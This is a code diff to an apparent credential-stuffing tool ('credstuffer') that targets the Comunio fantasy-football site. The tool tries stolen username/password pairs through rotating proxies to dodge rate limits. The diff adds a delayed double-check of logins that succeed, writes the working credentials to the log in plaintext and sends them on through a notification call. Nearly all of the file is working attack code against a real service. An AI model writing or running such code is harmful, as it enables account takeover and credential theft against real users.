@@ -1,5 +1,6 @@
 import logging
 import requests
+from time import sleep
 from concurrent.futures import ThreadPoolExecutor, as_completed
 
 from credstuffer import UserAccount
@@ -15,13 +16,13 @@ class Comunio(UserAccount):
 
     """
 
-    def __init__(self, max_requests=10000, notify=None, **kwargs):
+    def __init__(self, max_requests=10000, notify=None, token=None, **kwargs):
         self.logger = logging.getLogger('credstuffer')
-        self.logger.info('create class Comunio')
+        self.logger.info('Create class Comunio')
         self.name = 'Comunio'
 
         # init base class
-        super().__init__(name=self.name, notify=notify, **kwargs)
+        super().__init__(name=self.name, notify=notify, token=token, **kwargs)
 
         self.headers.update({
             'Origin': 'http://www.comunio.de',
@@ -56,17 +57,17 @@ class Comunio(UserAccount):
                                          .format(statuscode, user, password, self.session.proxies['http']))
 
                         if statuscode == 200:
-                            self.send_notification(username=user, password=password)
-                            # self.remove_username(username=user)  # temporary removed
-                        if statuscode == 500:
-                            self.logger.error(future.result().text)
+                            self.is_credentials_correct(user=user, password=password)
+                        elif statuscode != 400:
+                            raise ProxyNotSetError("Wrong response code {}. Renew Proxy!".format(statuscode))
+
             else:
                 # raise Error to renew Proxy
                 self.request_counter = 0
-                self.logger.error("Max number of proxy requests reached!. Renew Proxy")
+                self.logger.error("Max number of proxy requests reached!. Renew Proxy!")
                 raise ProxyMaxRequestError("Max number of proxy requests reached!")
         else:
-            raise ProxyNotSetError("No Proxy was set!")
+            raise ProxyNotSetError("No Proxy was set! Renew Proxy!")
 
     def __request_login(self, username, password):
         """ request login with an session object
@@ -83,9 +84,15 @@ class Comunio(UserAccount):
 
         except requests.exceptions.RequestException as ex:
             if self.is_internet_available():
-                raise ProxyBadConnectionError("Proxy Bad Connection: Exception: {}".format(ex))
+                raise ProxyBadConnectionError("RequestException with Bad Proxy Connection: {}".format(ex))
             else:
-                raise InternetConnectionError("InternetConnectionError: {}".format(ex))
+                raise InternetConnectionError("RequestException with InternetConnectionError: {}".format(ex))
+
+        except Exception as ex:
+            if self.is_internet_available():
+                raise ProxyBadConnectionError("Exception with Bad Proxy Connection: {}".format(ex))
+            else:
+                raise InternetConnectionError("Exception with InternetConnectionError: {}".format(ex))
 
         return request_login
 
@@ -96,6 +103,20 @@ class Comunio(UserAccount):
         if isinstance(proxy, dict):
             self.logger.info("set proxy to {}".format(proxy['http']))
             self.session.proxies = proxy
-            #self.session.proxies = {'http': '142.93.40.242:50001'}
         else:
             raise TypeError("proxy must be type of dictionary!")
+
+    def is_credentials_correct(self, user, password):
+        """ Double check of given credentials
+
+        :param user: username
+        :param password: password
+        """
+        sleep(2)
+        req_resp = self.__request_login(username=user, password=password)
+
+        if req_resp.status_code == 200:
+            self.logger.info("Fulfilled double check of credentials username: {} and password: {}".format(user, password))
+            self.send_notification(username=user, password=password)
+        else:
+            self.logger.error("Wrong comunio credentials username: {} and password: {}".format(user, password))
